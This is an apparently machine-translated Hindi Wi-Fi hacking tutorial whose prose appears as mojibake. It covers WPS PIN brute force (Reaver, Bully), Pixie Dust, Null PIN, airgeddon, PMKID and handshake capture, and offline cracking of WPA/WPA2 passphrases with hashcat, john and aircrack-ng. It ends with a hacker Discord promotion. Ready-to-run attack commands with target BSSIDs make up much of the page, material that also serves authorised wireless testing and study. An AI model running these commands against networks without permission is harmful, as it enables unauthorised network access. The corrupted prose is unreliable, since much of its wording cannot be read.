WPS (Wi-Fi Protected Setup) рдЙрдкрдХрд░рдгреЛрдВ рдХреЛ рд░рд╛рдЙрдЯрд░ рд╕реЗ рдЬреЛрдбрд╝рдиреЗ рдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рд╕рд░рд▓ рдмрдирд╛рддрд╛ рд╣реИ, WPA рдпрд╛ WPA2 рд╡реНрдпрдХреНрддрд┐рдЧрдд рдХреЗ рд╕рд╛рде рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рд▓рд┐рдП рд╕реЗрдЯрдЕрдк рдХреА рдЧрддрд┐ рдФрд░ рдЖрд╕рд╛рдиреА рдХреЛ рдмрдврд╝рд╛рддрд╛ рд╣реИред рдпрд╣ рдЖрд╕рд╛рдиреА рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд┐рдП рдЧрдП WEP рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рд▓рд┐рдП рдЕрдкреНрд░рднрд╛рд╡реА рд╣реИред WPS рдПрдХ 8-рдЕрдВрдХреАрдп PIN рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕реЗ рджреЛ рднрд╛рдЧреЛрдВ рдореЗрдВ рдорд╛рдиреНрдп рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдпрд╣ рд╕реАрдорд┐рдд рд╕рдВрдпреЛрдЬрдиреЛрдВ (11,000 рд╕рдВрднрд╛рд╡рдирд╛рдПрдБ) рдХреЗ рдХрд╛рд░рдг рдмреНрд░реВрдЯ-рдлреЛрд░реНрд╕ рд╣рдорд▓реЛрдВ рдХреЗ рдкреНрд░рддрд┐ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред

WPS Bruteforce

рдЗрд╕ рдХреНрд░рд┐рдпрд╛ рдХреЛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП 2 рдореБрдЦреНрдп рдЙрдкрдХрд░рдг рд╣реИрдВ: Reaver рдФрд░ Bullyред

  • Reaver рдХреЛ WPS рдХреЗ рдЦрд┐рд▓рд╛рдл рдПрдХ рдордЬрдмреВрдд рдФрд░ рд╡реНрдпрд╛рд╡рд╣рд╛рд░рд┐рдХ рд╣рдорд▓реЗ рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдФрд░ рдЗрд╕реЗ рд╡рд┐рднрд┐рдиреНрди рдкреНрд░рдХрд╛рд░ рдХреЗ рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ рдФрд░ WPS рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдХреЗ рдЦрд┐рд▓рд╛рдл рдкрд░реАрдХреНрд╖рдг рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

  • Bully WPS рдмреНрд░реВрдЯ рдлреЛрд░реНрд╕ рд╣рдорд▓реЗ рдХрд╛ рдирдпрд╛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рд╣реИ, рдЬреЛ C рдореЗрдВ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рд╣реИред рдЗрд╕рдореЗрдВ рдореВрд▓ рд░реАрд╡рд░ рдХреЛрдб рдХреА рддреБрд▓рдирд╛ рдореЗрдВ рдХрдИ рд▓рд╛рдн рд╣реИрдВ: рдХрдо рдирд┐рд░реНрднрд░рддрд╛рдПрдБ, рдмреЗрд╣рддрд░ рдореЗрдореЛрд░реА рдФрд░ CPU рдкреНрд░рджрд░реНрд╢рди, рдПрдВрдбрд┐рдпрдирдиреЗрд╕ рдХрд╛ рд╕рд╣реА рдкреНрд░рдмрдВрдзрди, рдФрд░ рд╡рд┐рдХрд▓реНрдкреЛрдВ рдХрд╛ рдПрдХ рдЕрдзрд┐рдХ рдордЬрдмреВрдд рд╕реЗрдЯред

рдпрд╣ рд╣рдорд▓рд╛ WPS PIN рдХреА рд╕рдВрд╡реЗрджрдирд╢реАрд▓рддрд╛ рдХрд╛ рд▓рд╛рдн рдЙрдард╛рддрд╛ рд╣реИ, рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдкрд╣рд▓реЗ рдЪрд╛рд░ рдЕрдВрдХреЛрдВ рдХреЗ рдЙрдЬрд╛рдЧрд░ рд╣реЛрдиреЗ рдФрд░ рдЕрдВрддрд┐рдо рдЕрдВрдХ рдХреА рдЪреЗрдХрд╕рдо рдХреЗ рд░реВрдк рдореЗрдВ рднреВрдорд┐рдХрд╛, рдЬрд┐рд╕рд╕реЗ рдмреНрд░реВрдЯ-рдлреЛрд░реНрд╕ рд╣рдорд▓реЗ рдХреЛ рдЖрд╕рд╛рди рдмрдирд╛рддрд╛ рд╣реИред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдЖрдХреНрд░рд╛рдордХ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЗ MAC рдкрддреЗ рдХреЛ рдмреНрд▓реЙрдХ рдХрд░рдиреЗ рдЬреИрд╕реЗ рдмреНрд░реВрдЯ-рдлреЛрд░реНрд╕ рд╣рдорд▓реЛрдВ рдХреЗ рдЦрд┐рд▓рд╛рдл рд░рдХреНрд╖рд╛ рдХреЗ рд▓рд┐рдП MAC рдкрддреЗ рдХрд╛ рд░реЛрдЯреЗрд╢рди рдЖрд╡рд╢реНрдпрдХ рд╣реИ рддрд╛рдХрд┐ рд╣рдорд▓реЗ рдХреЛ рдЬрд╛рд░реА рд░рдЦрд╛ рдЬрд╛ рд╕рдХреЗред

Bully рдпрд╛ Reaver рдЬреИрд╕реЗ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд╕рд╛рде WPS PIN рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдкрд░, рд╣рдорд▓рд╛рд╡рд░ WPA/WPA2 PSK рдХрд╛ рдЕрдиреБрдорд╛рди рд▓рдЧрд╛ рд╕рдХрддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рд╕реНрдерд╛рдпреА рдиреЗрдЯрд╡рд░реНрдХ рдкрд╣реБрдВрдЪ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рд╣реЛрддреА рд╣реИред

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

рд╕реНрдорд╛рд░реНрдЯ рдмреНрд░реВрдЯ рдлреЛрд░реНрд╕

рдпрд╣ рдкрд░рд┐рд╖реНрдХреГрдд рджреГрд╖реНрдЯрд┐рдХреЛрдг рдЬреНрдЮрд╛рдд рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ WPS PINs рдХреЛ рд▓рдХреНрд╖рд┐рдд рдХрд░рддрд╛ рд╣реИ:

  1. рдкреВрд░реНрд╡-рдЦреЛрдЬреЗ рдЧрдП PINs: рд╡рд┐рд╢рд┐рд╖реНрдЯ рдирд┐рд░реНрдорд╛рддрд╛рдУрдВ рд╕реЗ рдЬреБрдбрд╝реЗ рдЬреНрдЮрд╛рдд PINs рдХрд╛ рдПрдХ рдбреЗрдЯрд╛рдмреЗрд╕ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рдЬреЛ рд╕рдорд╛рди WPS PINs рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред рдпрд╣ рдбреЗрдЯрд╛рдмреЗрд╕ MAC-рдкрддреЗ рдХреЗ рдкрд╣рд▓реЗ рддреАрди рдСрдХреНрдЯреЗрдЯреНрд╕ рдХреЛ рдЗрди рдирд┐рд░реНрдорд╛рддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рд╕рдВрднрд╛рд╡рд┐рдд PINs рдХреЗ рд╕рд╛рде рд╕рд╣рд╕рдВрдмрдВрдзрд┐рдд рдХрд░рддрд╛ рд╣реИред

  2. PIN рдЬрдирд░реЗрд╢рди рдПрд▓реНрдЧреЛрд░рд┐рджрдо: ComputePIN рдФрд░ EasyBox рдЬреИрд╕реЗ рдПрд▓реНрдЧреЛрд░рд┐рджрдо рдХрд╛ рд▓рд╛рдн рдЙрдард╛рдПрдВ, рдЬреЛ AP рдХреЗ MAC-рдкрддреЗ рдХреЗ рдЖрдзрд╛рд░ рдкрд░ WPS PINs рдХреА рдЧрдгрдирд╛ рдХрд░рддреЗ рд╣реИрдВред Arcadyan рдПрд▓реНрдЧреЛрд░рд┐рджрдо рдХреЛ рдЕрддрд┐рд░рд┐рдХреНрдд рд░реВрдк рд╕реЗ рдПрдХ рдбрд┐рд╡рд╛рдЗрд╕ ID рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ, рдЬреЛ PIN рдЬрдирд░реЗрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдПрдХ рдкрд░рдд рдЬреЛрдбрд╝рддреА рд╣реИред

WPS рдкрд┐рдХреНрд╕реА рдбрд╕реНрдЯ рд╣рдорд▓рд╛

рдбреЛрдорд┐рдирд┐рдХ рдмреЛрдВрдЧрд╛рд░реНрдб рдиреЗ рдХреБрдЫ рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯреНрд╕ (APs) рдореЗрдВ рдЧреБрдкреНрдд рдХреЛрдб рдмрдирд╛рдиреЗ рдХреЗ рд╕рдВрдмрдВрдз рдореЗрдВ рдПрдХ рджреЛрд╖ рдЦреЛрдЬрд╛, рдЬрд┐рд╕реЗ рдиреЙрдирд╕реЗрд╕ (E-S1 рдФрд░ E-S2) рдХреЗ рд░реВрдк рдореЗрдВ рдЬрд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрджрд┐ рдЗрди рдиреЙрдирд╕реЗрд╕ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рддреЛ AP рдХреЗ WPS PIN рдХреЛ рдХреНрд░реИрдХ рдХрд░рдирд╛ рдЖрд╕рд╛рди рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред AP рд╡рд┐рд╢реЗрд╖ рдХреЛрдб (рд╣реИрд╢) рдХреЗ рднреАрддрд░ PIN рдкреНрд░рдХрдЯ рдХрд░рддрд╛ рд╣реИ рддрд╛рдХрд┐ рдпрд╣ рд╕рд╛рдмрд┐рдд рд╣реЛ рд╕рдХреЗ рдХрд┐ рдпрд╣ рд╡реИрдз рд╣реИ рдФрд░ рдХреЛрдИ рдирдХрд▓реА (рд░реЛрдЧ) AP рдирд╣реАрдВ рд╣реИред рдпреЗ рдиреЙрдирд╕реЗрд╕ рдореВрд▓ рд░реВрдк рд╕реЗ "рд╕реБрд░рдХреНрд╖рд┐рдд" рдХреЛ "рдЦреЛрд▓рдиреЗ" рдХреЗ рд▓рд┐рдП "рдЪрд╛рдмрд┐рдпрд╛рдБ" рд╣реИрдВ рдЬреЛ WPS PIN рдХреЛ рд░рдЦрддреА рд╣реИрдВред рдЗрд╕ рдкрд░ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдпрд╣рд╛рдБ рдорд┐рд▓ рд╕рдХрддреА рд╣реИред

рд╕рд░рд▓ рд╢рдмреНрджреЛрдВ рдореЗрдВ, рд╕рдорд╕реНрдпрд╛ рдпрд╣ рд╣реИ рдХрд┐ рдХреБрдЫ APs рдиреЗ рдХрдиреЗрдХреНрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рджреМрд░рд╛рди PIN рдХреЛ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкрд░реНрдпрд╛рдкреНрдд рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдЪрд╛рдмрд┐рдпрд╛рдБ рдХрд╛ рдЙрдкрдпреЛрдЧ рдирд╣реАрдВ рдХрд┐рдпрд╛ред рдЗрд╕рд╕реЗ PIN рдХреЛ рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рдмрд╛рд╣рд░ рд╕реЗ рдЕрдиреБрдорд╛рдирд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдордЬреЛрд░ рдмрдирд╛ рджрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ (рдСрдлрд▓рд╛рдЗрди рдмреНрд░реВрдЯ рдлреЛрд░реНрд╕ рд╣рдорд▓рд╛)ред

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

рдпрджрд┐ рдЖрдк рдбрд┐рд╡рд╛рдЗрд╕ рдХреЛ рдореЙрдирд┐рдЯрд░ рдореЛрдб рдореЗрдВ рд╕реНрд╡рд┐рдЪ рдирд╣реАрдВ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдпрд╛ reaver рдФрд░ bully рдореЗрдВ рдХреБрдЫ рд╕рдорд╕реНрдпрд╛ рд╣реИ, рддреЛ рдЖрдк OneShot-C рдЖрдЬрдорд╛ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╣ рдЙрдкрдХрд░рдг Pixie Dust рд╣рдорд▓реЗ рдХреЛ рдореЙрдирд┐рдЯрд░ рдореЛрдб рдореЗрдВ рд╕реНрд╡рд┐рдЪ рдХрд┐рдП рдмрд┐рдирд╛ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реИред

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin рд╣рдорд▓рд╛

рдХреБрдЫ рдЦрд░рд╛рдм рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдП рдЧрдП рд╕рд┐рд╕реНрдЯрдо рдПрдХ Null PIN (рдЦрд╛рд▓реА рдпрд╛ рдЧреИрд░-рдореМрдЬреВрдж PIN) рдХреЛ рдПрдХреНрд╕реЗрд╕ рджреЗрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреЗ рд╣реИрдВ, рдЬреЛ рдХрд┐ рдХрд╛рдлреА рдЕрд╕рд╛рдорд╛рдиреНрдп рд╣реИред рдЙрдкрдХрд░рдг Reaver рдЗрд╕ рдХрдордЬреЛрд░реА рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реИ, рдЗрд╕рдХреЗ рд╡рд┐рдкрд░реАрдд Bullyред

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

рд╕рднреА рдкреНрд░рд╕реНрддрд╛рд╡рд┐рдд WPS рд╣рдорд▓реЗ airgeddon рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЖрд╕рд╛рдиреА рд╕реЗ рдХрд┐рдП рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВред

  • 5 рдФрд░ 6 рдЖрдкрдХреЛ рдЖрдкрдХрд╛ рдХрд╕реНрдЯрдо PIN рдЖрдЬрдорд╛рдиреЗ рджреЗрддреЗ рд╣реИрдВ (рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдХреЛрдИ рд╣реИ)

  • 7 рдФрд░ 8 Pixie Dust рд╣рдорд▓реЗ рдХреЛ рдЕрдВрдЬрд╛рдо рджреЗрддреЗ рд╣реИрдВ

  • 13 рдЖрдкрдХреЛ NULL PIN рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ

  • 11 рдФрд░ 12 рдЪреБрдиреЗ рдЧрдП AP рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд PINs рдХреЛ рдЙрдкрд▓рдмреНрдз рдбреЗрдЯрд╛рдмреЗрд╕ рд╕реЗ рдкреБрдирдГ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВрдЧреЗ рдФрд░ рд╕рдВрднрд╛рд╡рд┐рдд PINs рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВрдЧреЗ: ComputePIN, EasyBox рдФрд░ рд╡реИрдХрд▓реНрдкрд┐рдХ рд░реВрдк рд╕реЗ Arcadyan (рд╕рд┐рдлрд╛рд░рд┐рд╢ рдХреА рдЧрдИ, рдХреНрдпреЛрдВ рдирд╣реАрдВ?)

  • 9 рдФрд░ 10 рд╣рд░ рд╕рдВрднрд╛рд╡рд┐рдд PIN рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░реЗрдВрдЧреЗ

WEP

рдЕрдм рдпрд╣ рдмрд╣реБрдд рдЯреВрдЯрд╛ рд╣реБрдЖ рдФрд░ рдЕрдкреНрд░рдпреБрдХреНрдд рд╣реИред рдмрд╕ рдЬрд╛рди рд▓реЗрдВ рдХрд┐ airgeddon рдХреЗ рдкрд╛рд╕ рдЗрд╕ рдкреНрд░рдХрд╛рд░ рдХреА рд╕реБрд░рдХреНрд╖рд╛ рдкрд░ рд╣рдорд▓рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП "All-in-One" рдирд╛рдо рдХрд╛ рдПрдХ WEP рд╡рд┐рдХрд▓реНрдк рд╣реИред рдЕрдзрд┐рдХ рдЙрдкрдХрд░рдг рд╕рдорд╛рди рд╡рд┐рдХрд▓реНрдк рдкреНрд░рджрд╛рди рдХрд░рддреЗ рд╣реИрдВред


рдЕрдиреБрднрд╡реА рд╣реИрдХрд░реЛрдВ рдФрд░ рдмрдЧ рдмрд╛рдЙрдВрдЯреА рд╢рд┐рдХрд╛рд░рд┐рдпреЛрдВ рдХреЗ рд╕рд╛рде рд╕рдВрд╡рд╛рдж рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП HackenProof Discord рд╕рд░реНрд╡рд░ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реЛрдВ!

Hacking Insights рд╣реИрдХрд┐рдВрдЧ рдХреЗ рд░реЛрдорд╛рдВрдЪ рдФрд░ рдЪреБрдиреМрддрд┐рдпреЛрдВ рдореЗрдВ рдЧрд╣рд░рд╛рдИ рд╕реЗ рдЬрд╛рдиреЗ рд╡рд╛рд▓реЗ рд╕рд╛рдордЧреНрд░реА рдХреЗ рд╕рд╛рде рдЬреБрдбрд╝реЗрдВ

Real-Time Hack News рддреЗрдЬ-рддрд░реНрд░рд╛рд░ рд╣реИрдХрд┐рдВрдЧ рджреБрдирд┐рдпрд╛ рдХреЗ рд╕рд╛рде рдЕрджреНрдпрддрд┐рдд рд░рд╣реЗрдВ рд╡рд╛рд╕реНрддрд╡рд┐рдХ рд╕рдордп рдХреА рд╕рдорд╛рдЪрд╛рд░ рдФрд░ рдЕрдВрддрд░реНрджреГрд╖реНрдЯрд┐ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ

Latest Announcements рдирд╡реАрдирддрдо рдмрдЧ рдмрд╛рдЙрдВрдЯреА рд▓реЙрдиреНрдЪ рдФрд░ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо рдЕрдкрдбреЗрдЯ рдХреЗ рд╕рд╛рде рд╕реВрдЪрд┐рдд рд░рд╣реЗрдВ

Join us on Discord рдФрд░ рдЖрдЬ рд╣реА рд╢реАрд░реНрд╖ рд╣реИрдХрд░реЛрдВ рдХреЗ рд╕рд╛рде рд╕рд╣рдпреЛрдЧ рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░реЗрдВ!


WPA/WPA2 PSK

PMKID

2018 рдореЗрдВ, hashcat рдиреЗ рдПрдХ рдирдпрд╛ рд╣рдорд▓рд╛ рд╡рд┐рдзрд┐ рдХрд╛ рдЦреБрд▓рд╛рд╕рд╛ рдХрд┐рдпрд╛, рдЬреЛ рдЕрджреНрд╡рд┐рддреАрдп рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕реЗ рдХреЗрд╡рд▓ рдПрдХрд▓ рдкреИрдХреЗрдЯ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ рдФрд░ рдЗрд╕реЗ рд▓рдХреНрд╖реНрдп AP рд╕реЗ рдЬреБрдбрд╝реЗ рдХрд┐рд╕реА рднреА рдХреНрд▓рд╛рдЗрдВрдЯ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реЛрддреАтАФрдмрд╕ рд╣рдорд▓рд╛рд╡рд░ рдФрд░ AP рдХреЗ рдмреАрдЪ рдмрд╛рддрдЪреАрддред

рдХрдИ рдЖрдзреБрдирд┐рдХ рд░рд╛рдЙрдЯрд░ рд╕рдВрдШ рдХреЗ рджреМрд░рд╛рди рдкрд╣рд▓реЗ EAPOL рдлреНрд░реЗрдо рдореЗрдВ рдПрдХ рд╡реИрдХрд▓реНрдкрд┐рдХ рдлрд╝реАрд▓реНрдб рдЬреЛрдбрд╝рддреЗ рд╣реИрдВ, рдЬрд┐рд╕реЗ Robust Security Network рдХреЗ рд░реВрдк рдореЗрдВ рдЬрд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИред рдЗрд╕рдореЗрдВ PMKID рд╢рд╛рдорд┐рд▓ рд╣реИред

рдЬреИрд╕рд╛ рдХрд┐ рдореВрд▓ рдкреЛрд╕реНрдЯ рдореЗрдВ рдмрддрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ, PMKID рдЬреНрдЮрд╛рдд рдбреЗрдЯрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдмрдирд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

рдпрд╣ рджреЗрдЦрддреЗ рд╣реБрдП рдХрд┐ "PMK рдирд╛рдо" рд╕реНрдерд┐рд░ рд╣реИ, рд╣рдореЗрдВ AP рдФрд░ рд╕реНрдЯреЗрд╢рди рдХрд╛ BSSID рдкрддрд╛ рд╣реИ, рдФрд░ PMK рдПрдХ рдкреВрд░реНрдг 4-рддрд░рдлрд╛ рд╣реИрдВрдбрд╢реЗрдХ рд╕реЗ рд╕рдорд╛рди рд╣реИ, hashcat рдЗрд╕ рдЬрд╛рдирдХрд╛рд░реА рдХрд╛ рдЙрдкрдпреЛрдЧ PSK рдХреЛ рдХреНрд░реИрдХ рдХрд░рдиреЗ рдФрд░ рдкрд╛рд╕рдлрд╝реНрд░реЗрдЬрд╝ рдХреЛ рдкреБрдирд░реНрдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд░ рд╕рдХрддрд╛ рд╣реИ!

рдЗрд╕ рдЬрд╛рдирдХрд╛рд░реА рдХреЛ рдЗрдХрдЯреНрдард╛ рдХрд░рдиреЗ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рд╕реНрдерд╛рдиреАрдп рд░реВрдк рд╕реЗ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs рдХреИрдкреНрдЪрд░ рдХрд┐рдП рдЧрдП рдХрдВрд╕реЛрд▓ рдореЗрдВ рджрд┐рдЦрд╛рдП рдЬрд╛рдПрдВрдЧреЗ рдФрд░ рд╕рд╛рде рд╣реА /tmp/attack.pcap рдХреЗ рдЕрдВрджрд░ рднреА рд╕рд╣реЗрдЬреЗ рдЬрд╛рдПрдВрдЧреЗред рдЕрдм, рдХреИрдкреНрдЪрд░ рдХреЛ hashcat/john рдкреНрд░рд╛рд░реВрдк рдореЗрдВ рдкрд░рд┐рд╡рд░реНрддрд┐рдд рдХрд░реЗрдВ рдФрд░ рдЗрд╕реЗ рдХреНрд░реИрдХ рдХрд░реЗрдВ:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

рдХреГрдкрдпрд╛ рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдПрдХ рд╕рд╣реА рд╣реИрд╢ рдХрд╛ рдкреНрд░рд╛рд░реВрдк 4 рднрд╛рдЧреЛрдВ рдореЗрдВ рд╣реЛрддрд╛ рд╣реИ, рдЬреИрд╕реЗ: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдХреЗрд╡рд▓ 3 рднрд╛рдЧ рд╣реИрдВ, рддреЛ рдпрд╣ рдЕрдорд╛рдиреНрдп рд╣реИ (PMKID рдХреИрдкреНрдЪрд░ рдорд╛рдиреНрдп рдирд╣реАрдВ рдерд╛)ред

рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ hcxdumptool рд╣реИрдВрдбрд╢реЗрдХ рднреА рдХреИрдкреНрдЪрд░ рдХрд░рддрд╛ рд╣реИ (рдХреБрдЫ рдРрд╕рд╛ рджрд┐рдЦрд╛рдИ рджреЗрдЧрд╛: MP:M1M2 RC:63258 EAPOLTIME:17091)ред рдЖрдк рд╣реИрдВрдбрд╢реЗрдХ рдХреЛ hashcat/john рдкреНрд░рд╛рд░реВрдк рдореЗрдВ cap2hccapx рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкрд░рд┐рд╡рд░реНрддрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

рдореИрдВрдиреЗ рджреЗрдЦрд╛ рд╣реИ рдХрд┐ рдЗрд╕ рдЙрдкрдХрд░рдг рдХреЗ рд╕рд╛рде рдХреИрдкреНрдЪрд░ рдХрд┐рдП рдЧрдП рдХреБрдЫ рд╣реИрдВрдбрд╢реЗрдХ рдХреЛ рд╕рд╣реА рдкрд╛рд╕рд╡рд░реНрдб рдЬрд╛рдирдиреЗ рдХреЗ рдмрд╛рд╡рдЬреВрдж рдХреНрд░реИрдХ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрд╛ред рдореИрдВ рд╕реБрдЭрд╛рд╡ рджреВрдВрдЧрд╛ рдХрд┐ рдпрджрд┐ рд╕рдВрднрд╡ рд╣реЛ рддреЛ рдкрд╛рд░рдВрдкрд░рд┐рдХ рддрд░реАрдХреЗ рд╕реЗ рднреА рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВ, рдпрд╛ рдЗрд╕ рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЙрдирдореЗрдВ рд╕реЗ рдХрдИ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВред

рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░

WPA/WPA2 рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рдПрдХ рд╣рдорд▓рд╛ рдПрдХ рд╣реИрдВрдбрд╢реЗрдХ рдХреЛ рдХреИрдкреНрдЪрд░ рдХрд░рдХреЗ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдСрдлрд▓рд╛рдЗрди рдХреНрд░реИрдХ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░рдХреЗ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдиреЗрдЯрд╡рд░реНрдХ рдФрд░ BSSID рдХреЗ рд╕рдВрдЪрд╛рд░ рдХреА рдирд┐рдЧрд░рд╛рдиреА рдХрд░рдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИ, рдПрдХ рд╡рд┐рд╢реЗрд╖ рдЪреИрдирд▓ рдкрд░ред рдпрд╣рд╛рдБ рдПрдХ рд╕рдВрдХреНрд╖рд┐рдкреНрдд рдорд╛рд░реНрдЧрджрд░реНрд╢рд┐рдХрд╛ рд╣реИ:

  1. рд▓рдХреНрд╖реНрдп рдиреЗрдЯрд╡рд░реНрдХ рдХрд╛ BSSID, рдЪреИрдирд▓, рдФрд░ рдПрдХ рдХрдиреЗрдХреНрдЯреЗрдб рдХреНрд▓рд╛рдЗрдВрдЯ рдкрд╣рдЪрд╛рдиреЗрдВред

